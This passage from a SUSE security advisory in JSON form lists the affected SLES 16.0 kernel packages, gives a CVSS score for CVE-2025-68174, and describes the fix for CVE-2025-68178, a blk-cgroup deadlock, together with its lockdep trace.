"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68174"
},
{
"cve": "CVE-2025-68178",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68178"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-cgroup: fix possible deadlock while configuring policy\n\nFollowing deadlock can be triggered easily by lockdep:\n\nWARNING: possible circular locking dependency detected\n6.17.0-rc3-00124-ga12c2658ced0 #1665 Not tainted\n------------------------------------------------------\ncheck/1334 is trying to acquire lock:\nff1100011d9d0678 (\u0026q-\u003esysfs_lock){+.+.}-{4:4}, at: blk_unregister_queue+0x53/0x180\n\nbut task is already holding lock:\nff1100011d9d00e0 (\u0026q-\u003eq_usage_counter(queue)#3){++++}-{0:0}, at: del_gendisk+0xba/0x110\n\nwhich lock already depends on the new lock.\n\nthe existing dependency chain (in reverse order) is:\n\n-\u003e #2 (\u0026q-\u003eq_usage_counter(queue)#3){++++}-{0:0}:\n blk_queue_enter+0x40b/0x470\n blkg_conf_prep+0x7b/0x3c0\n tg_set_limit+0x10a/0x3e0\n cgroup_file_write+0xc6/0x420\n kernfs_fop_write_iter+0x189/0x280\n vfs_write+0x256/0x490\n ksys_write+0x83/0x190\n __x64_sys_write+0x21/0x30\n x64_sys_call+0x4608/0x4630\n do_syscall_64+0xdb/0x6b0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n-\u003e #1 (\u0026q-\u003erq_qos_mutex){+.+.}-{4:4}:\n __mutex_lock+0xd8/0xf50\n mutex_lock_nested+0x2b/0x40\n wbt_init+0x17e/0x280\n wbt_enable_default+0xe9/0x140\n blk_register_queue+0x1da/0x2e0\n __add_disk+0x38c/0x5d0\n add_disk_fwnode+0x89/0x250\n device_add_disk+0x18/0x30\n virtblk_probe+0x13a3/0x1800\n virtio_dev_probe+0x389/0x610\n really_probe+0x136/0x620\n __driver_probe_device+0xb3/0x230\n driver_probe_device+0x2f/0xe0\n __driver_attach+0x158/0x250\n bus_for_each_dev+0xa9/0x130\n driver_attach+0x26/0x40\n bus_add_driver+0x178/0x3d0\n driver_register+0x7d/0x1c0\n __register_virtio_driver+0x2c/0x60\n virtio_blk_init+0x6f/0xe0\n do_one_initcall+0x94/0x540\n kernel_init_freeable+0x56a/0x7b0\n kernel_init+0x2b/0x270\n ret_from_fork+0x268/0x4c0\n ret_from_fork_asm+0x1a/0x30\n\n-\u003e #0 (\u0026q-\u003esysfs_lock){+.+.}-{4:4}:\n __lock_acquire+0x1835/0x2940\n lock_acquire+0xf9/0x450\n __mutex_lock+0xd8/0xf50\n mutex_lock_nested+0x2b/0x40\n blk_unregister_queue+0x53/0x180\n __del_gendisk+0x226/0x690\n del_gendisk+0xba/0x110\n sd_remove+0x49/0xb0 [sd_mod]\n device_remove+0x87/0xb0\n device_release_driver_internal+0x11e/0x230\n device_release_driver+0x1a/0x30\n bus_remove_device+0x14d/0x220\n device_del+0x1e1/0x5a0\n __scsi_remove_device+0x1ff/0x2f0\n scsi_remove_device+0x37/0x60\n sdev_store_delete+0x77/0x100\n dev_attr_store+0x1f/0x40\n sysfs_kf_write+0x65/0x90\n kernfs_fop_write_iter+0x189/0x280\n vfs_write+0x256/0x490\n ksys_write+0x83/0x190\n __x64_sys_write+0x21/0x30\n x64_sys_call+0x4608/0x4630\n do_syscall_64+0xdb/0x6b0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nother info that might help us debug this:\n\nChain exists of:\n \u0026q-\u003esysfs_lock --\u003e \u0026q-\u003erq_qos_mutex --\u003e \u0026q-\u003eq_usage_counter(queue)#3\n\n Possible unsafe locking scenario:\n\n CPU0 CPU1\n ---- ----\n lock(\u0026q-\u003eq_usage_counter(queue)#3);\n lock(\u0026q-\u003erq_qos_mutex);\n lock(\u0026q-\u003eq_usage_counter(queue)#3);\n lock(\u0026q-\u003esysfs_lock);\n\nRoot cause is that queue_usage_counter is grabbed with rq_qos_mutex\nheld in blkg_conf_prep(), while queue should be freezed before\nrq_qos_mutex from other context.\n\nThe blk_queue_enter() from blkg_conf_prep() is used to protect against\npolicy deactivation, which is already protected with blkcg_mutex, hence\nconvert blk_queue_enter() to blkcg_mutex to fix this problem. Meanwhile,\nconsider that blkcg_mutex is held after queue is freezed from policy\ndeactivation, also convert blkg_alloc() to use GFP_NOIO.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
